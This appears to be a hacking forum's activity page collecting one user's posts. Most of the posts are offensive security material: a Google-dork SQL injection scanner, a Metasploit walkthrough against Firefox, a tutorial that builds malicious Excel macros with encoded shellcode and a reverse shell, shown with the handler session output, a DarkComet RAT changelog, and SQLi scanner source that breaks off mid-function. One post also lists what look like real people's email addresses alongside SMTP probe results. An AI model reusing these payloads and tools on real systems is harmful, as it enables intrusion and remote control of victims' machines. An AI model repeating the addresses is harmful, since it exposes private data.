-
Posts
3206 -
Joined
-
Days Won
87
Everything posted by Fi8sVrs
-
Want to make some easy profits in your free time?
Fi8sVrs replied to costy202002ro's topic in Cosul de gunoi
No. Spam! -
On the 4th of august at the world largest technical security conference - BlackHat USA 2011, which will take place in Las Vegas, SAP security expert and CTO of ERPScan Alexander Polyakov will show how any malicious attacker can get access to the systems running on SAP via Internet using new critical vulnerability. SAP systems are used in more than 100 000 world companies to handle business-critical data and processes. Almost in each company from Forbes 500 system data are set for the handling of any process beginning from purchasing, human resources and financial reporting and ending with communication with other business systems. Thus receiving an access by the malicious attacker leads to complete control over the financial flow of the company, which can be used for espionage, sabotage and fraudful actions against hacked company. The given attack is possible due to dangerous vulnerability of the new type, detected by Alexander in J2EE engine of SAP NetWeaver software, which allows bypassing authorization checks. For example it is possible to create a user and assign him to the administrators group using two unauthorized requests to the system. It is also dangerous because that attack is possible on systems, protected by the two-factor authentication systems, in which it is needed to know secret key and password to get access. To prove it researchers from ERPScan created a program, which detects SAP servers in the Internet with help of secret Google keyword and checks found servers on potential dangerous vulnerability. As the result, more than half of available servers could be hacked with help of found vulnerability. “Danger is in that it is not only a new vulnerability, but a whole class of vulnerabilities that was theoretically described earlier but not popular in practice. During our research we only detected several examples in standard system configuration, and because each company customizes the system under its own business processes, new examples of vulnerabilities of the given class can be potentially detected at each company in the future. We have developed a free program which can detect unique vulnerabilities of such type in order to protect companies on time and it is also included in our professional product – ERPScan Security Scanner for SAP.” — noted Alexander. Source
-
This video will demonstrate how a simple XSS vulnerability can be leveraged to gain complete control of your web-browser and eventually lead to a complete system compromise. 1) We will use a cross-site scripting vulnerability as the initial attack vector 2) Exploit XSS by redirecting the user’s browser to the Evil_IP with a JavaScript loop (every 2 secs) 3) Exploit the victim’s browser to gain system ‘root’ or ‘shell’ access 4) Elevate our privileges to system-level 5) Dump the memory contents from an active SSH session and steal the SSH password from the victim’s computer Video: XSS Attack - Busting Browsers to Root! on Vimeo CREDITS Attack Demo by: Qjax - securitystreetknowledge.com XSSF Framework by: Lodovic Courgnaud - CONIX Security Putty Password Dump by: Colin Ames @ David Kerb Music by: x1machine
-
@jKy_gbg ai pm
-
Wordpress & ClassiPress Theme demo: http://www.appthemes.com/demo/?theme=classipress sau cauta: free classifieds ad script
-
HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets. It works on Linux and Windows running the following: Requirements: python python-qt4 cx_Oracle python-mysqldb python-psycopg2 python-pymssql python-qscintilla2 To install simply run the following command in terminal after changing directory to the path were the downloaded package is: Icons and Running the application: Software Icon can be found at the application Menu of the GNOME desktop interfaces Icon can also be found at /usr/share/applications for KDE and also GNOME: There you find "HexorBase.desktop" To get the source code for this project from SVN, here's the checkout link: Heres a video on how the program works Video Credits: "Maurizio Schmidt" HexorBase - The Database Hacker Tool - YouTube Download: http://hexorbase.googlecode.com/files/hexorbase_1.0_all.deb Description: 249 KB Debian installer for linux based systems SHA1 Checksum: 49ff0cf9e48341fef830f0744d29becfaaa37ad0 Download & source project
-
Yet Another Email Verifier 1.0 Verify emails by checking the "RCPT TO" return code from the SMTP server. Hints: The output is separated by commas, so you can easily import it to another application (e.g. MS Excel). Create an address list by using the Smashing Email eXtractor! Failed checks are added at the bottom (! <domain>) Requirements: python (tested with python 2.6.2) dnspython Usage: yaev.py <file> file: absolute path to email-address list Example: [B]$ cat addresses.txt[/B] [B]...[/B] wolfgang.schaeuble@wk.bundestag.de gm.schulz@gmail.com jan.sipocz@gmail.com brigitte.kopinits@gmail.com r.buchmann@amag.at annimarie.schaffer@gmail.com iggy.popovic@gmail.com erich.gabis@gmail.com Kovacs.maria4@gmail.com andreas.schimon@gmail.com barbarajungreithmair@gmail.com michael.gabis@gmail.com [B]$ ./yaev.py addresses.txt > checked_emails.txt $ cat checked_emails.txt ...[/B] wolfgang.schaeuble@wk.bundestag.de,mail1.dbtg.de,554,5.7.1 Service unavailable; Client host [83.187.177.131] blocked using zen.spamhaus.org; http://www.spamhaus.org/query/bl?ip=83.187.177.131 gm.schulz@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 6si6034pxi.95 jan.sipocz@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 13si2013478pxi.35 brigitte.kopinits@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 27si2008921pxi.56 r.buchmann@amag.at,srxx0055.amag.at,503,5.0.0 Need MAIL before RCPT annimarie.schaffer@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 35si2021257pxi.2 iggy.popovic@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 37si2019611pxi.5 erich.gabis@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 2si2010789pxi.52 Kovacs.maria4@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 42si2017013pxi.17 andreas.schimon@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 9si2018016pxi.13 barbarajungreithmair@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 40si2003494pxi.87 michael.gabis@gmail.com,alt2.gmail-smtp-in.l.google.com,250,2.1.5 OK 37si2019846pxi.5 !gmx.de Code: #!/usr/bin/env python # -*- coding: utf-8 -*- # # yaev.py # # Version: 1.0 # # Copyright (C) 2009 novacane novacane[at]dandies[dot]org # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # DO NOT FORGET TO INSTALL DNSPYTHON - http://www.dnspython.org/ # # For more information visit: # http://dandies.org/files/41b1d9240cf1df328f4e63d087769440-44.html # import os import sys import smtplib import dns.resolver def main(path_to_src_file): """ Get SMTP return code Verify emails by checking the "RCPT TO" return code from the SMTP server. NOTE: dropped vrfy command because provider disabled it to prevent attacks """ failed_domains = [] try: # Open the Source-File. file_emails = open(path_to_src_file) except IOError: print "Error reading file!" print "!> " + path_to_src_file sys.exit(1) # Loop through addresses. Each line represents an email-address. for line in file_emails: # Remove Linefeed. line = line.replace("\n", "") # The actual domain. domain = line.split("@")[1] # Do nothing if domain is already in the failed_domain list. if not domain in failed_domains: try: # Make a MX DNS query. answers = dns.resolver.query(domain, "MX") # OR: mx = str(answers[1].exchange)[:-1] for rdata in answers: # Remove the dot from rdata.exchange. mx = str(rdata.exchange)[:-1] try: # Connect to SMTP server. smtp = smtplib.SMTP(mx) # Polite people say hello first. smtp.docmd("HELO microsoft.com") # Indicates who is sending the mail. smtp.docmd("MAIL FROM:", "<asdf@microsoft.com>") # Indicates who is recieving the mail. rcpt = smtp.docmd("RCPT TO:", "<" + line + ">") # Print output. print line + "," + mx + "," + \ str(rcpt[0]) + "," + str(rcpt[1]) # Close SMTP connection. smtp.quit() except smtplib.SMTPServerDisconnected: # Add domain to list. failed_domains.append(domain) # Use only the first server-address. break # Raise exception if DNS query failed. except dns.resolver.NXDOMAIN: # Add domain to list. failed_domains.append(domain) # Close the Source-File. file_emails.close() # Output failed domains. if failed_domains: for item in failed_domains: print "!" + item if __name__ == '__main__': if len(sys.argv) != 2: print "\n\t[*] yet another email verifier 1.0 [*]" print "\n\tUsage: yaev.py <file>" sys.exit(2) main(sys.argv[1]) Dounload source
- 3 replies
-
- email verifier
- smtp
-
(and 1 more)
Tagged with:
-
Easily search for exploits in BackTrack's exploitdb (files.csv). Highlights: Search the exploitdb archive Case sensitive & insensitive Change output mode Automaticlly copy your exploits Requirements: python (tested with python 2.7.1 and 2.5.2) local exploitdb (pre-installed on BackTrack Linux) Usage: Options: --version show program's version number and exit -h, --help show this help message and exit -c, --casesensitive switch to casesensitive -v, --verbose detailed output -d PATH, --destination=PATH path to copy exploits #!/usr/bin/env python # -*- coding: utf-8 -*- # # exploitdbee.py # # Version: 1.0 # # Copyright (C) 2011 novacane novacane[at]dandies[dot]org # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import sys import os import re import shutil from getpass import getpass from optparse import OptionParser def main(casesensitive, verbose, exploitpath, *args): exploitdbcsv = "/pentest/exploits/exploitdb/files.csv" if not os.path.isfile(exploitdbcsv): print "ERROR: EXPLOITDB DOESN'T EXIST" sys.exit(1) # Open the exploitdb. try: f = open(exploitdbcsv) except: print "ERROR: CAN'T OPEN EXPLOITDB - FILES.CSV" sys.exit(1) exploitlist = [] # First: Search the exploitdb and save the results to a list. for line in f: if casesensitive: if re.search(re.escape(args[0][0]), line): exploitlist.append(line) elif not casesensitive: if re.search(re.escape(args[0][0]), line, re.I): exploitlist.append(line) # The number of loops is the number of arguments. i = 1 arglen = len(args[0]) # Second: Cleanup the initial list. # Loop through the list and remove all items which don't match the remaining argument(s). if arglen > 1: while True: # Make a copy of the list to iterate over it. for l in exploitlist[:]: if casesensitive: if not re.search(re.escape(args[0][i]), l): exploitlist.remove(l) elif not casesensitive: if not re.search(re.escape(args[0][i]), l, re.I): exploitlist.remove(l) i += 1 if i == arglen: break # Output found exploits. for i in exploitlist: if verbose: print i.strip("\n") else: print i.split(",")[2] + " => " + i.split(",")[1] print "\n" print str(len(exploitlist)) + " EXPLOITS FOUND." f.close() if not exploitpath: sys.exit() # Copy the exploits. while True: try: copyinput = raw_input("Copy exploits to destination? [y/n]: ") if copyinput == "y": if os.path.isdir(exploitpath): try: for i in exploitlist: shutil.copy("/pentest/exploits/exploitdb/" + i.split(",")[1], exploitpath) except: print "ERROR: CAN'T COPY FILES TO DESTINATION" sys.exit(1) else: print "ERROR: DESTINATION DOESN'T EXIST" break elif copyinput == "n": print "BYE" sys.exit() else: print "ERROR: WRONG INPUT" except KeyboardInterrupt: print "\n" sys.exit(1) if __name__ == '__main__': help_message = "\n\t[*] exploitdbee 1.0 [*]\n\t[*] by dandies.org [*]\n\n\tTry: exploitdbee.py --help\n" usage = "\n %prog [-c] [-d path] <term1> <term2> <term3> <term...>\n %prog \"windows 7\" remote \ \n %prog -c Microsoft IIS -d /tmp" parser = OptionParser(usage=usage, version="%prog 1.0") parser.add_option("-c", "--casesensitive", action="store_true", dest="casesensitive", help="switch to casesensitive") parser.add_option("-v", "--verbose", action="store_true", dest="verbose", help="detailed output") parser.add_option("-d", "--destination", metavar="PATH", dest="exploitpath", help="path to copy exploits") (options, args) = parser.parse_args() if len(args) == 0: print help_message sys.exit(2) # Default values. if options.exploitpath: exploitpath = options.exploitpath else: exploitpath = "" if options.casesensitive: casesensitive = 1 else: casesensitive = 0 if options.verbose: verbose = 1 else: verbose = 0 main(casesensitive, verbose, exploitpath, args) Download source
-
Netswipe turns your webcam into a credit card reader, brings POS payments to the desktop Credit card fraud costs the banking industry billions of dollars every year, and with companies yet to find an entirely secure system for processing payments online, there's no end in sight for unauthorized transactions. Jumio hopes to bring both security and convenience to the world of online payments, however, with its webcam-based Netswipe secure card reader solution. The system replicates the point of sale (POS) transactions you experience when making in-store purchases, prompting cardholders to scan the front on their credit card, then enter their CVV code using a tamperproof mouse-controlled interface. We're not sure how the software is able to distinguish a physical credit card from, say, a photocopy of a card, but it certainly sounds more secure than the standard input form we use today. It also reduces card number theft from insecure forms and website spoofing, by verifying details through a live video stream. Jump past the break for the full press release, along with video overviews of Netswipe and Jumio, which recently secured $6.5 million in initial funding and is backed by Facebook co-founder Eduardo Saverin. Video: Viddler.com - Netswipe Webcam Credit Card Reader - Uploaded by engadget Jumio The End of Cash on Vimeo Netswipe turns your webcam into a credit card reader, brings POS payments to the desktop -- Engadget
-
Tutorial putty - Cum sa folosesti un nologin
Fi8sVrs replied to FearDotCom's topic in Tutoriale in romana
a mai fost http://rstcenter.com/forum/33499-hide-ip-cu-putty.rst -
[Linux] Problema cu un stick
Fi8sVrs replied to GarryOne's topic in Sisteme de operare si discutii hardware
incearca cu cd Windows XP -
#!/usr/bin/python## Dorker.py ## SQL Dork finder script that crawls google for sites vulnerable to SQL Injection ## Author: Xinapse ## Website: http://www.iexploit.org ## Email: iexploittube@gmail.com ## Twitter: #iExploitXinapse ## Version 0.0.1 ## Usage dorker.py [options] from xgoogle.search import GoogleSearch, SearchError import time, urllib2, optparse print ''' ________ __ \______ \ ___________| | __ ____ _______ | | \ / _ \_ __ \ |/ /_/ __ \\_ __ \ | ` ( <_> ) | \/ < \ ___/ | | \/ /_______ /\____/|__| |__|_ \ \___ >|__| \/ \/ \/ --------------------------------------------------------------------------------- -- dorker.py -- -- SQL Dork finder script -- -- Author: Xinapse -- -- Website: http://www.iexploit.org -- -- Email: iexploittube@gmail.com -- -- Twitter: #iExploitXinapse -- -- Version 0.0.1 -- -- Usage dorker.py [options] -- --------------------------------------------------------------------------------- ''' parser = optparse.OptionParser() options = optparse.OptionGroup(parser, 'Options') parser.add_option('-d', '--dork', action='store', type='string', help='Dork to Scan', metavar='DORK') parser.add_option('-f', '--file', action='store', type='string', help='Filename to save', metavar='FILE') parser.add_option('-v', '--verbose', action="store_true", dest="verbose", default=False, help="Adds extra status messages showing program execution") parser.add_option('-e', '--evasion', action='store', type='string', help='How long to sleep between each google request, used to prevent google blocking your IP for too many requests, recommended at least 5+, default 10', metavar='EVASION') (opts, args) = parser.parse_args() urlno = 0 invuln = 0 if opts.dork: dork = opts.dork else: print '>> Please enter a dork' if opts.file: filename = opts.file else: print '>> Please enter a filename' if opts.verbose: verbose = 'true' else: verbose = 'false' if opts.evasion: evas = opts.evasion else: evas = 10 pagecount = 0 counter = 0 try: pagecount = pagecount + 1 if verbose == 'true': print '>> Crawling google page ' + str(pagecount) + '...' search = GoogleSearch(dork) while True: search.results_per_page=100 tmp = search.get_results() if not tmp: break if verbose == 'true': print '>> No more results...' for t in tmp: try: url = t.url.encode("utf8") if verbose == 'true': print '>> Testing ' + url + ' for vulnerabilities...' testurl = url + "'" req = urllib2.urlopen(testurl) data = req.read() if "sql" in data or "SQL" in data or "MySQL" in data or "MYSQL" in data or "MSSQL" in data: f = open (filename, "a") if verbose == 'true': print ">> Found possible injection in " + url f.write(testurl + "\n") f.close() counter = counter + 1 else: invuln = invuln + 1 except: errors = 1 if verbose == 'true': print '>> Sleeping to bypass google flood protection...' time.sleep(evas) except SearchError, e: print ">> Search failed: %s" % e print '>> Dorker scan ended' print '>> ' + str(counter) + ' vulnerable sites found' print '>> ' + str(invuln) + ' sites not vulnerable' print '>> Thank you for using Dorker, output has been saved to ' + filename Download xgoogle library: https://github.com/pkrumins/xgoogle Dorker.py A SQL Injection Dork Scanner
-
---[by DarkCoderSc]--- - Button sidebar back with a nicer gui , for my chinese friends that prefer buttons - [Active Ports] Now process name always display correctly - Active Ports added to client in Socket list to help you to figure some problemes or be sure all working fine - Melt function totally recoded using another way via FWB++ work 100% of the time on 32 and 64bit systems. - Uninstall function is more stable if not using persistance - Persistance totally recoded using FWB++ working on 32 and 64bit. - Process Manager refresh 2x faster - Remote shell is now better - File transfer is now more stable - Webcam more stable - Webcam can be stetch now - Delete folder work fine now ( recursive too ) - File creation added in remote list of file manager - File modification added in remote list of file manager - File attrib added in remote list of file manager (click on file attrib colum for more info) - I reinstall Delphi 2010 in english this time, so all label might be in english now - Now client keep is size when restored from tray - Now when you stop capture of desktop, last captured window picture stay - New toast design - FixComet available on DarkComet-RAT [Official Website] - Mini Download (FASM) is now working 100% fine (no more "not Win32 valid...") - Startup been optimized - Startup use fwb++ to install - Startup persistance use now fwb++ too - upload logs to FTP now working fine - Now you can choose wich monitor to capture if the user got multi monitors (thanks mjord5 for the idea) - Synthax highlighters was updated - A big prob fix (now you can for example capture two desktop at the same time without any prob) Download link: DarkComet-RAT [Official Website]
-
Today while surfing I read some news about nsTreeRange Mozilla Firefox version 3.5 to 3.6.1.6 Vulnerability. Actually this vulnerbility ranking is not excellent or good, but it's normal vulnerability. This vulnerability was known at 2011-07-10 by sinn3r. In this tutorial I'm using Windows 7 for my victim Operating system with Mozilla Firefox v 3.5.17. If you also want to try out this tutorial, you can find Mozilla Firefox version which I describe above at oldapps.com. Requirements : 1. Metasploit Framework 2. Linux OS or Backtrack 5(Metasploit already included inside this distro) I. The first step, just go to your msfconsole, and then use exploit/windows/browser/mozilla_nstreerange. If it returns cannot find exploit, maybe you should update your msf framework first by running msfupdate. msf > use exploit/windows/browser/mozilla_nstreerange msf exploit(mozilla_nstreerange) > show options Module options (exploit/windows/browser/mozilla_nstreerange): Name Current Setting Required Description ---- --------------- -------- ----------- CreateThread true yes Whether to execute the payload in a new thread SEHProlog true yes Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Auto (Direct attack against Windows XP, otherwise through Java, if enabled) II. There's a few option you should set up first before launching this exploit. SRVHOST : Your IP address acts as exploit server SRVPORT : port use to serve request from victim. The default value is 8080 but if your port 80 was free, it's better to use port 80. URIPATH : It's something looks like http://localhost/URIPATH, you can change this value to make URIPATH more readable by human e.g : http://localhost/ANTIVIRUS, etc. In above picture I'm also using meterpreter reverse_tcp payload. but you can choose the most suitable payload for you III. Everything was set up correctly, then run exploit to run our malicious webserver. IV. After the victim opened our malicious URL we've already send to them, our server processing and create new notepad.exe process at victim computer. Below is the screenshot. V. A new session ID 1 has created, the next step we can interract with that session ID to gain privilege on victim computer That's it we're already inside victim computer. Countermeasure : - Always update your Mozilla Firefox into lastest version. - Use personal firewall to detect inbound and outbound traffic. Hope it's useful Hacking Mozilla Firefox 3.5 to 3.6 nsTreeRange Vulnerability Using Metasploit | Vishnu Valentino Hacking Tutorial, Tips and Trick
-
First, let's create our shellcode using metasploit's msfpayload: For windows/exec payload: root@coresec:~# msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai \ -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > CALC.R [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 254 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 281 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 308 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 335 (iteration=5) For reverse_tcp payload: root@coresec:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.200.20 LPORT=4444 R | msfencode \ -e x86/shikata_ga_nai -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > RVR.R [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) For your own executable file: root@coresec:~# msfencode -i backdoor.exe -e x86/shikata_ga_nai -c 10 \ -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BD.R [*] x86/shikata_ga_nai succeeded with size 66589 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 66618 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 66647 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 66676 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 66705 (iteration=5) Next step is to convert shellcodes to VBScript using the shellcode2vbscript_v0_1 python tool from Didier Stevens: root@coresec:~# wget http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip --2011-04-23 14:30:31-- http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip Resolving www.didierstevens.com... 173.201.107.126 Connecting to www.didierstevens.com|173.201.107.126|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1378 (1.3K) [application/x-zip-compressed] Saving to: `shellcode2vbscript_v0_1.zip' 100%[===========================================================>] 1,378 --.-K/s in 0s 2011-04-23 14:30:52 (86.4 MB/s) - `shellcode2vbscript_v0_1.zip' saved [1378/1378] root@coresec:~# mkdir shellcode2vbscript root@coresec:~# unzip shellcode2vbscript_v0_1.zip -d shellcode2vbscript Archive: shellcode2vbscript_v0_1.zip inflating: shellcode2vbscript/shellcode2vbscript.py root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py CALC.R CALC.vbs root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py RVR.R RVR.vbs root@coresec:~# ls -al CALC.vbs RVR.vbs -rw-r--r-- 1 root root 3418 Apr 23 14:29 CALC.vbs -rw-r--r-- 1 root root 3888 Apr 23 14:30 RVR.vbs Now, our VBScripts are ready, lets see the code of CALC.vbs: Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long Const MEM_COMMIT = &H1000 Const PAGE_EXECUTE_READWRITE = &H40 Private Sub ExecuteShellCode() Dim lpMemory As Long Dim sShellCode As String Dim lResult As Long sShellCode = ShellCode() lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE) lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&) lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&) End Sub Private Function ParseBytes(strBytes) As String Dim aNumbers Dim sShellCode As String Dim iIter sShellCode = "" aNumbers = split(strBytes) for iIter = lbound(aNumbers) to ubound(aNumbers) sShellCode = sShellCode + Chr(aNumbers(iIter)) next ParseBytes = sShellCode End Function Private Function ShellCode1() As String Dim sShellCode As String sShellCode = "" sShellCode = sShellCode + ParseBytes("218 203 184 213 89 140 182 217 116 36 244 95 51 201 177 78 131 239 252 49 71 19 3") sShellCode = sShellCode + ParseBytes("146 74 110 67 199 185 183 216 211 181 243 2 32 140 238 29 101 57 95 218 184 225 184") sShellCode = sShellCode + ParseBytes("102 82 237 186 48 149 215 242 145 177 70 202 221 13 155 44 133 217 202 138 232 188") sShellCode = sShellCode + ParseBytes("196 51 198 163 90 239 67 214 55 124 8 120 173 104 221 142 124 57 128 1 165 213 25") sShellCode = sShellCode + ParseBytes("211 78 145 37 3 200 28 171 244 145 218 247 129 189 181 255 86 252 194 249 233 79 245") sShellCode = sShellCode + ParseBytes("2 25 97 248 38 184 12 119 242 187 205 87 102 116 144 151 201 158 251 33 25 5 144 53") sShellCode = sShellCode + ParseBytes("100 184 8 207 129 122 171 10 62 99 17 116 34 148 79 156 42 73 228 18 96 6 167 143") sShellCode = sShellCode + ParseBytes("228 34 41 111 247 123 85 247 68 166 80 189 205 190 158 93 137 28 108 212 133 52 185") sShellCode = sShellCode + ParseBytes("215 180 95 192 145 200 108 24 117 173 140 206 118 82 154 64 167 202 183 53 137 2 91") sShellCode = sShellCode + ParseBytes("80 100 244 232 208 219 177 71 199 253 147 155 121 72 25 62 202 76 46 221 95 172 86") sShellCode = sShellCode + ParseBytes("237 36 238 199 178 145 95 176 119 135 37 122 45 141 64 166 103 5 48 237 174 171 192") sShellCode = sShellCode + ParseBytes("243 41 24 82 137 232 168 50 187 1 241 73 171 228 212 185 165 227 15 22 27 4 14 205") sShellCode = sShellCode + ParseBytes("66 211 92 161 216 171 236 199 7 240 255 87 192 38 121 162 8 216 18 111 250 92 45 32") sShellCode = sShellCode + ParseBytes("247 238 33 196 105 210 232 13 127 104 232 201 95 57 96 189 67 97 242 253 193 198 186") sShellCode = sShellCode + ParseBytes("109 199 61 47 71 59 141 138 186 249") ShellCode1 = sShellCode End Function Private Function ShellCode() As String Dim sShellCode As String sShellCode = "" sShellCode = sShellCode + ShellCode1() ShellCode = sShellCode End Function Then, we are able to insert the malicious VBScript to our Excel files (CALC.vbs -> CALC.xlsm & RVR.vbs -> RVR.xlsm): Finally let's execute our Macros: root@coresec:~# msfconsole | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.7.0-dev [core:3.7 api:1.0] + -- --=[ 680 exploits - 354 auxiliary + -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12397 updated yesterday (2011.04.21) msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(handler) > set lhost 192.168.200.20 lhost => 192.168.200.20 msf exploit(handler) > set lport 4444 lport => 4444 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.200.20:4444 [*] Starting the payload handler... [*] Sending stage (240 bytes) to 192.168.200.2 [*] Command shell session 1 opened (192.168.200.20:4444 -> 192.168.200.25:45668) at Sat Apr 23 14:54:32 +0300 2011 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\coresec\Documents> NoVirusThanks results: Download: shellcode2vbscript_v0_1 RVR.xlsm CALC.xlsm Create Malicious Excel files using Metasploit and Shellcode2vbscript « AfterShell.com – IT Security Blog
-
Below you can find the Source Code of the Damn Small SQLi Scanner (DSSS) v. 0.1b having less than 100 LOC (Lines of Code): #!/usr/bin/env python import difflib, httplib, optparse, random, re, sys, urllib2, urlparse NAME = "Damn Small SQLi Scanner (DSSS) < 100 LOC (Lines of Code)" VERSION = "0.1b" AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)" LICENSE = "GPLv2 (www.gnu.org/licenses/gpl-2.0.html)" NOTE = "This is a fully working PoC proving that commercial (SQLi) scanners can be beaten under 100 lines of code (6 hours of work, boolean, error, level 1 crawl)" INVALID_SQL_CHAR_POOL = ['(',')','\'','"'] CRAWL_EXCLUDE_EXTENSIONS = ("gif","jpg","jar","tif","bmp","war","ear","mpg","wmv","mpeg","scm","iso","dmp","dll","cab","so","avi","bin","exe","iso","tar","png","pdf","ps","mp3","zip","rar","gz") SUFFIXES = ["", "-- ", "#"] PREFIXES = [" ", ") ", "' ", "') "] BOOLEANS = ["AND %d=%d", "OR NOT (%d=%d)"] DBMS_ERRORS = {} DBMS_ERRORS["MySQL"] = [r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."] DBMS_ERRORS["PostgreSQL"] = [r"PostgreSQL.*ERROr", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."] DBMS_ERRORS["Microsoft SQL Server"] = [r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"Exception Details:.*\WSystem\.Data\.SqlClient\.", r"Exception Details:.*\WRoadhouse\.Cms\."] DBMS_ERRORS["Microsoft Access"] = [r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"] DBMS_ERRORS["Oracle"] = [r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"] DBMS_ERRORS["IBM DB2"] = [r"CLI Driver.*DB2", r"DB2 SQL error", r"db2_connect\(", r"db2_exec\(", r"db2_execute\(", r"db2_fetch_"] DBMS_ERRORS["Informix"] = [r"Exception.*Informix"] DBMS_ERRORS["Firebird"] = [r"Dynamic SQL Error", r"Warning.*ibase_.*"] DBMS_ERRORS["SQLite"] = [r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::"] DBMS_ERRORS["SAP MaxDB"] = [r"SQL error.*POS([0-9]+).*", r"Warning.*maxdb.*"] DBMS_ERRORS["Sybase"] = [r"Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"] DBMS_ERRORS["Ingres"] = [r"Warning.*ingres_", r"Ingres SQLSTATE", r"Ingres\W.*Driver"] def getTextOnly(page): retVal = re.sub(r"(?s)|<!--.+?-->||<[^>]+>|\s", " ", page) retVal = re.sub(r"\s{2,}", " ", retVal) return retVal def retrieveContent(url): retVal = ["", httplib.OK, "", ""] # [filtered/textual page content, HTTP code, page title, full page content] try: retVal[3] = urllib2.urlopen(url.replace(" ", "%20")).read() except Exception, e: if hasattr(e, 'read'): retVal[3] = e.read() elif hasattr(e, 'msg'): retVal[3] = e.msg retVal[1] = e.code if hasattr(e, 'code') else None match = re.search(r"(?P<title>[^<]+)", retVal[3]) retVal[2] = match.group("title") if match else "" 